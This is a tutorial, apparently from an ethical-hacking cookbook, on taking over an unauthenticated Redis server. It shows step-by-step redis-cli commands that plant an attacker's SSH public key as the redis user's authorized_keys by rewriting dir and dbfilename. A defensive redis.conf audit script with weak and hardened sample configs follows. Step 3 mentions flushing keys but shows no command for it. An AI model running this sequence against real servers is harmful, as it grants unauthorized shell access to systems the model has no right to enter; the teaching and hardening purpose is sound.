In this article we are going to gain access to a Redis installation that is running without authentication, ending up logged in as the user “redis”.
Disclaimer
All the stunts/hacks performed in this article are only for educational purposes and for CTFs. This article and the author are in no way responsible for any hack or misuse of the information.
Prerequisite:
The Redis command-line tools must be installed on your (Linux) system. If they are not, install them with the following command:
    sudo apt-get install redis-tools
Now fire up your terminal and follow the steps:
1. Generate your SSH key pair using the following command.
    ssh-keygen -t rsa
2. Now add some blank lines before and after the public key and store the result in a new file, ‘key.txt’ (the name is your choice). The padding keeps the key on its own lines once it is embedded in the Redis dump file. Use the following command.
    (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt
3. Now store our key in the database. The existing keys are flushed first so that the dump file will contain only our key; then upload it with the following command (x.x.x.x is the Redis host).
    cat key.txt | redis-cli -h x.x.x.x -p 6379 -x set bb
4. When all the above steps are done without error, we need to make Redis write its dump file into the .ssh folder of the redis user's home directory under the name “authorized_keys”. This is done with these commands:
4.1. Connect to the host.
    redis-cli -h x.x.x.x
4.2. Check the current dump directory.
    config get dir
4.3. Change the directory to the .ssh folder.
    config set dir /path/to/.ssh/
4.4. Change the name of the dump file to “authorized_keys” and then save the database to disk.
    config set dbfilename "authorized_keys"
    save
5. All done. Now try to SSH to the server with the private key; we see that we are logged in as the “redis” user.
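From the defender's side, every step above depends on four settings in redis.conf: no requirepass, a listener bound on all interfaces, protected-mode off, and a reachable CONFIG command. The following audit script is an added example, not code from the article or from the cookbook; the two sample configuration fragments are constructed, and the hardened one shows the corrected settings beside the weak ones.

```python
# Constructed sample configs (not from the original article): the weak one
# has the exposure the walkthrough relies on, the hardened one closes it.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass use-a-long-random-secret
rename-command CONFIG ""
dir /var/lib/redis
dbfilename dump.rdb
"""


def parse_conf(text):
    """Return redis.conf directives as a dict: name -> list of argument lists."""
    directives = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        directives.setdefault(name.lower(), []).append(args)
    return directives


def audit(text):
    """List the settings that let an anonymous client redirect dir/dbfilename."""
    d = parse_conf(text)
    findings = []
    if "requirepass" not in d:
        findings.append("no requirepass: anyone reaching the port can issue commands")
    binds = [a for args in d.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind exposes the listener on all interfaces")
    pm = d.get("protected-mode", [["yes"]])[0]
    if not pm or pm[0].lower() != "yes":
        findings.append("protected-mode disabled")
    renamed = {a[0].upper(): a[1] for a in d.get("rename-command", []) if len(a) == 2}
    if renamed.get("CONFIG") != '""':
        findings.append("CONFIG reachable: dir/dbfilename can be changed at runtime")
    return findings
```

Running redis as a user whose home directory is not writable by the service (so no .ssh/authorized_keys can be created) is a further layer the config alone does not show.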
SOURCE: KALI LINUX: AN ETHICAL HACKER'S COOKBOOK